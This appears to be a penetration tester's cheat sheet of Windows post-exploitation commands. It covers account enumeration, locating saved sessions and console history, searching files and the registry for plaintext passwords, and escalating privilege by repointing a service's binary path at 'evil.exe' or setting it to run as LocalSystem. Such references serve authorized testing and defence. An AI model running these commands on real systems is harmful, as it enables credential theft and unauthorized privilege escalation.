Windows enumeration cheatsheet
==============================
Common things to look on Windows

[[_TOC_]]

#### User accounts
##### Local username enumeration

    net user
    net user <username>

##### Domain username enumeration

    net user /domain
    net user <username> /domain
##### Local group enumeration

    net localgroup
    net localgroup <group>

##### Domain group enumeration

    net group /domain
    net group <group> /domain

#### Network
##### View network shares

    net share

#### RDP history

    HKCU\Software\Microsoft\Terminal Server Client\

#### Recent files

    %APPDATA%\Microsoft\Windows\Recent

#### Saved Putty sessions

    Software\<name>\PuTTY\Sessions\

#### Powershell console history

    %APPDATA%\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

#### Sensitive files and credentials
##### Find files by keywords

    dir /s *pass* == *cred* == *vnc* == *.config*

##### Find plaintext credentials

    findstr /rpsi /c:"net use.*/user:" C:\*

##### Find strings in file types

    findstr /si <keyword> *.xml *.ini *.txt

##### Find password strings in regkeys
Local machine/Local user

    reg query HKLM /f password /t REG_SZ /s
    reg query HKCU /f password /t REG_SZ /s

#### Services
##### List all service permissions with accesschk.exe

    accesschk.exe -accepteula -uwcqv "Authenticated Users" *

##### List service permissions with accesschk.exe

    accesschk.exe -accepteula -ucqv <service>

##### Query service 

    sc qc <service>

##### Modify service binary path
Note the <space> after "binpath="

    sc config <service> binpath= "X:\path\to\evil.exe"

##### Modify privileges on service
Note the <space> after "obj="

    sc config <serivce> obj= ".\LocalSystem" password= ""

##### Modify dependencies on service
Note the <space> after "depend="

    sc config <service> depend= ""

#### Permissions
##### Permissions check

    cacls <file>
    icacls <file>

##### Set permissions

    cacls <file> /grant <username>:(<perm>,<perm>)
    icacls <file> /grant <username>:(<perm>,<perm>)

e.g.

    icacls test.txt /grant:John:(d,wdac)

##### Find writable permissions on %windir%
Note that you might not be able to list directory

    %windir%\system32\microsoft\crypto\rsa\machinekeys
    %windir%\system32\tasks_migrated\microsoft\windows\pla\system
    %windir%\syswow64\tasks\microsoft\windows\pla\system
    %windir%\debug\wia
    %windir%\system32\tasks
    %windir%\syswow64\tasks
    %windir%\tasks
    %windir%\registration\crmlog
    %windir%\system32\com\dmp
    %windir%\system32\fxstmp
    %windir%\system32\spool\drivers\color
    %windir%\system32\spool\printers
    %windir%\system32\spool\servers
    %windir%\syswow64\com\dmp
    %windir%\syswow64\com\fxstmp
    %windir%\temp
    %windir%\tracing

